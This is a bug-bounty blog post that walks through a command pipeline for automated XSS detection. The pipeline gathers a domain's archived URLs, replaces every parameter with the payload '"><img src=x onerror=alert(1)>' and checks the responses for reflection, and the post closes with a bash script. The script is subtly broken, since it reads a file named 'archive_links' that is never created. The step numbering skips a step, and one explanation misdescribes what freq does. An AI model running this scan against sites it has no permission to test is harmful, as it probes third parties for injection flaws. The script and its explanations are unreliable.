Automating XSS

1337.Krip
System Weakness
Published in
4 min readJul 4, 2023

--

Hey folks,

How have you been?

Automation became very popular nowadays so what about automating XSS detection?

So let get started

Who am I ?

Hi, i am Ujwal AKA Krip who just started bug bounty. in today’s article you will know about automating xss detection using few open sources tools.

Basically there are 4 minor parts for automating xss

  1. Gathering urls
  2. removing similar and duplicates urls
  3. finding parameters in urls and checking if they are vulnerable to xss or not

Step:1 Gathering urls

For this we are using a famous tool like waybackurl and gau for gathering all urls

Let suppose domain as Target.com

waybackurls example.com > archive_url
gau example.com >> archive_url
sort -u archive_links -o archive_url

This command will find old and archived urls using waybackurl and gau. after that we are removing similar urls using sort command and storing in archive_url file

Step:2 removing similar and duplicates urls

for removing similar urls we are using the tool named as uro

Installation process of uro is given in github. i am leaving the link you can download from there.

Example of uro ( taken from github)

Let’s use uro

cat archive_url | uro | tee -a archive_url_uro

After this we will get worthwhile url for xss

Step:4 finding parameters in urls and checking if they are vulnerable to xss or not

To achieve this we will use tools like qsreplace and freq

Qsreplace: By using qsreplace we are replacing the parameter value to the specified payload. In our case that is “><img src=x onerror=alert(1)> you can replace with your own payload

freq: The output of qsreplace is passed on to freq. What freq does on a brief is like it curl’s the endpoint and checks for our payload reflection in the response.

Here is the final command

cat archive_url_uro | grep "=" | qsreplace '"><img src=x onerror=alert(1)>' | freq | grep -iv "Not Vulnerable" | tee -a freq_xss_findings

The given command performs a series of operations on a file named “archive_url_uro.” Here is a breakdown of what each part of the command does:

  1. cat archive_url_uro: This command reads the contents of the file "archive_url_uro" and displays them on the screen.
  2. grep "=": This command filters the output of the previous command and selects only the lines that contain the equal sign (=).
  3. qsreplace '"><img src=x onerror=alert(1)>': This command replaces the values on each line selected by the previous command with the string "><img src=x onerror=alert(1)>. The qsreplace utility is commonly used to replace query string parameters in URLs.
  4. freq: This command counts the frequency of each line in the output.
  5. grep -iv "Not Vulnerable": This command filters the output and excludes any lines that contain the case-insensitive phrase "Not Vulnerable."
  6. tee -a freq_xss_findings: This command appends the filtered output to a file named "freq_xss_findings" while also displaying it on the screen.

Automating XSS

here is the juicy part you all are waiting for

#!/bin/bash

echo "[+] Running waybackurls"
waybackurls $1 > archive_url
echo "[+] Running gau"
gau $1 >> archive_url
sort -u archive_links -o archive_url
cat archive_links | uro | tee -a archive_url_uro
echo "[+] Starting qsreplace and freq"
cat archive_url_uro | grep "=" | qsreplace '"><img src=x onerror=alert(1)>' | freq | tee -a freq_output | grep -iv "Not Vulnerable" | tee -a freq_xss_findings
echo "[+] Script Execution Ended"

This script collects the “waybackurls” (archived URLs) for specific domains. It then filters out duplicate, similar, or irrelevant URLs. After that, it utilizes the “qsreplace” and “freq” tools to identify and count valid instances of Cross-Site Scripting (XSS) vulnerabilities. The findings are stored in a file called “freq_xss_findings.

Pass the domain as an argument for the script like “./script.sh Target.com”.

HAPPY HUNT HUNTERS !!!!!!

That’s all for today, Thank you for reading.

Happy Hunting!!!

--

--